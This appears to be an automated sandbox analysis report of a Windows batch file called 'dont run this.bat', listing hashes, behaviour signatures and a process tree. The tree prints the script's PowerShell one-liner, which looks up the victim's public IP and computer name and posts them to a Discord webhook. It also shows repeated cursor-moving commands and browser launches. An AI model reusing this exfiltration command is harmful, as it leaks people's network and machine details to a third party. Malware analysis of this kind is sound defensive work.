370775267b4f4d986ce5b481610f0c81f27bde141afbc2bd9aa49e41da91ff7a

Analysis

max time kernel
84s
max time network
72s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03/06/2024, 02:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dont run this.bat
Size

779B
MD5

7799b0af4639555e34764d2a5ab6ea66
SHA1

01b74bfea617b239a0eb0336c43f60276b32d1b1
SHA256

370775267b4f4d986ce5b481610f0c81f27bde141afbc2bd9aa49e41da91ff7a
SHA512

57aa20aa8d1a9e861fa02ca6363653c4cdf06c275d510cc57bfbc76d6dbb5c75fbdca02778bcc6b1e64542c444046ee45bd0835b33d5cbbf5cb4ac02ac4b1bcb

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
7	4748	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation	cmd.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ipinfo.io

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5648	powershell.exe
6048	powershell.exe
5228	powershell.exe
5496	powershell.exe
5984	powershell.exe
3568	powershell.exe
5240	powershell.exe
2680	powershell.exe
5932	powershell.exe
5660	powershell.exe
5464	powershell.exe
5216	powershell.exe
5764	powershell.exe
5436	powershell.exe
2488	powershell.exe
1920	powershell.exe
5848	powershell.exe
672	powershell.exe
5688	powershell.exe
1684	powershell.exe
6072	powershell.exe
4476	powershell.exe
1700	powershell.exe
4748	powershell.exe
1188	powershell.exe
5664	powershell.exe
5656	powershell.exe
5772	powershell.exe
1608	powershell.exe
5980	powershell.exe
5828	powershell.exe
5368	powershell.exe
5756	powershell.exe
4824	powershell.exe
4248	powershell.exe
5772	powershell.exe
4308	powershell.exe
6060	powershell.exe
2004	powershell.exe
5556	powershell.exe
3812	powershell.exe
5752	powershell.exe
3336	powershell.exe
5432	powershell.exe
4584	powershell.exe
5832	powershell.exe
3136	powershell.exe
6076	powershell.exe
2680	powershell.exe
5820	powershell.exe
5228	powershell.exe
5828	powershell.exe
5372	powershell.exe
5276	powershell.exe
5796	powershell.exe
5244	powershell.exe
5228	powershell.exe
5184	powershell.exe
4756	powershell.exe
3328	powershell.exe
5428	powershell.exe
5872	powershell.exe
2488	powershell.exe
4968	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
2680	timeout.exe
3432	timeout.exe
5224	timeout.exe
5836	timeout.exe
2552	timeout.exe
4352	timeout.exe
3276	timeout.exe
5184	timeout.exe
6072	timeout.exe
4644	timeout.exe
4636	timeout.exe
6060	timeout.exe
1172	timeout.exe
5340	timeout.exe
5876	timeout.exe
6004	timeout.exe
2476	timeout.exe
3324	timeout.exe
3568	timeout.exe
6040	timeout.exe
612	timeout.exe
5436	timeout.exe
5368	timeout.exe
5940	timeout.exe
5232	timeout.exe
5972	timeout.exe
4672	timeout.exe
5276	timeout.exe
5360	timeout.exe
6048	timeout.exe
4900	timeout.exe
1920	timeout.exe
4396	timeout.exe
6004	timeout.exe
4756	timeout.exe
3064	timeout.exe
5660	timeout.exe
4964	timeout.exe
5820	timeout.exe
6080	timeout.exe
5012	timeout.exe
5816	timeout.exe
2680	timeout.exe
5592	timeout.exe
1832	timeout.exe
5876	timeout.exe
5180	timeout.exe
5368	timeout.exe
6096	timeout.exe
5580	timeout.exe
6048	timeout.exe
5384	timeout.exe
5276	timeout.exe
5012	timeout.exe
5848	timeout.exe
2232	timeout.exe
5352	timeout.exe
5652	timeout.exe
5848	timeout.exe
5764	timeout.exe
5372	timeout.exe
2072	timeout.exe
3692	timeout.exe
5376	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4748	powershell.exe
4748	powershell.exe
4260	chrome.exe
4260	chrome.exe
1252	msedge.exe
1252	msedge.exe
3256	msedge.exe
3256	msedge.exe
5244	powershell.exe
5244	powershell.exe
5244	powershell.exe
5752	powershell.exe
5752	powershell.exe
5752	powershell.exe
5980	powershell.exe
5980	powershell.exe
5980	powershell.exe
5228	powershell.exe
5228	powershell.exe
5228	powershell.exe
3328	powershell.exe
3328	powershell.exe
3328	powershell.exe
5632	identity_helper.exe
5632	identity_helper.exe
1920	powershell.exe
1920	powershell.exe
1920	powershell.exe
5660	powershell.exe
5660	powershell.exe
5660	powershell.exe
1684	powershell.exe
1684	powershell.exe
1684	powershell.exe
5828	powershell.exe
5828	powershell.exe
5828	powershell.exe
5464	powershell.exe
5464	powershell.exe
5464	powershell.exe
5428	powershell.exe
5428	powershell.exe
5428	powershell.exe
5660	powershell.exe
5660	powershell.exe
5660	powershell.exe
5728	powershell.exe
5728	powershell.exe
5728	powershell.exe
5292	powershell.exe
5292	powershell.exe
5292	powershell.exe
6072	powershell.exe
6072	powershell.exe
6072	powershell.exe
5848	powershell.exe
5848	powershell.exe
5848	powershell.exe
5372	powershell.exe
5372	powershell.exe
5372	powershell.exe
5212	powershell.exe
5212	powershell.exe
5212	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs

pid	Process
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4748	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5244	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5752	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5228	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	3328	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	1920	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5660	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	1684	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5828	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5464	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5428	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5660	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5728	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5292	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	6072	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5848	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5372	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5212	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5664	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeShutdownPrivilege	4260	chrome.exe
Token: SeCreatePagefilePrivilege	4260	chrome.exe
Token: SeDebugPrivilege	5656	powershell.exe

Suspicious use of FindShellTrayWindow 51 IoCs

pid	Process
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe

Suspicious use of SendNotifyMessage 48 IoCs

pid	Process
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
4260	chrome.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe
3256	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 4748	1964	cmd.exe	84
PID 1964 wrote to memory of 4748	1964	cmd.exe	84
PID 1964 wrote to memory of 1832	1964	cmd.exe	88
PID 1964 wrote to memory of 1832	1964	cmd.exe	88
PID 1964 wrote to memory of 4260	1964	cmd.exe	93
PID 1964 wrote to memory of 4260	1964	cmd.exe	93
PID 4260 wrote to memory of 396	4260	chrome.exe	95
PID 4260 wrote to memory of 396	4260	chrome.exe	95
PID 1964 wrote to memory of 3256	1964	cmd.exe	96
PID 1964 wrote to memory of 3256	1964	cmd.exe	96
PID 1964 wrote to memory of 2408	1964	cmd.exe	97
PID 1964 wrote to memory of 2408	1964	cmd.exe	97
PID 3256 wrote to memory of 2756	3256	msedge.exe	98
PID 3256 wrote to memory of 2756	3256	msedge.exe	98
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 4184	4260	chrome.exe	99
PID 4260 wrote to memory of 2176	4260	chrome.exe	100
PID 4260 wrote to memory of 2176	4260	chrome.exe	100
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101
PID 4260 wrote to memory of 5004	4260	chrome.exe	101

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\dont run this.bat"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {$ip = Invoke-RestMethod http://ipinfo.io/json | Select-Object -ExpandProperty ip; $pcName = $env:COMPUTERNAME; $webhook = 'YOUR_DISCORD_WEBHOOK_URL'; $msg = 'IP Address: ' + $ip + ' | PC Name: ' + $pcName; Invoke-RestMethod -Uri $webhook -Method Post -Body @{content = $msg}}"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4748
- C:\Windows\system32\timeout.exe
  timeout /t 3
  2⤵
  - Delays execution with timeout.exe
  PID:1832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe"
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4260
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff95676ab58,0x7ff95676ab68,0x7ff95676ab78
    3⤵
    PID:396
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1604 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:2
    3⤵
    PID:4184
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:2176
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2284 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:5004
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3016 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:1
    3⤵
    PID:4356
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3024 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:1
    3⤵
    PID:4616
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4264 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:1
    3⤵
    PID:404
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4388 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:1304
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4424 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:4640
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4820 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:5480
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 --field-trial-handle=1948,i,14567086588164660439,4103006903969226548,131072 /prefetch:8
    3⤵
    PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3256
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff947d246f8,0x7ff947d24708,0x7ff947d24718
    3⤵
    PID:2756
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
    3⤵
    PID:1648
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1252
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2636 /prefetch:8
    3⤵
    PID:3844
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
    3⤵
    PID:4392
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
    3⤵
    PID:3796
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:1
    3⤵
    PID:5892
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:1
    3⤵
    PID:5900
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
    3⤵
    PID:5164
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3576 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5632
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1
    3⤵
    PID:5708
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1
    3⤵
    PID:2344
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,17959416605240122656,6909181474541253548,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
    3⤵
    PID:6112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2408
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5468
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& {[System.Windows.Forms.Cursor]::Position = New-Object System.Drawing.Point ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width / 2), ([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height / 2)}"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5876
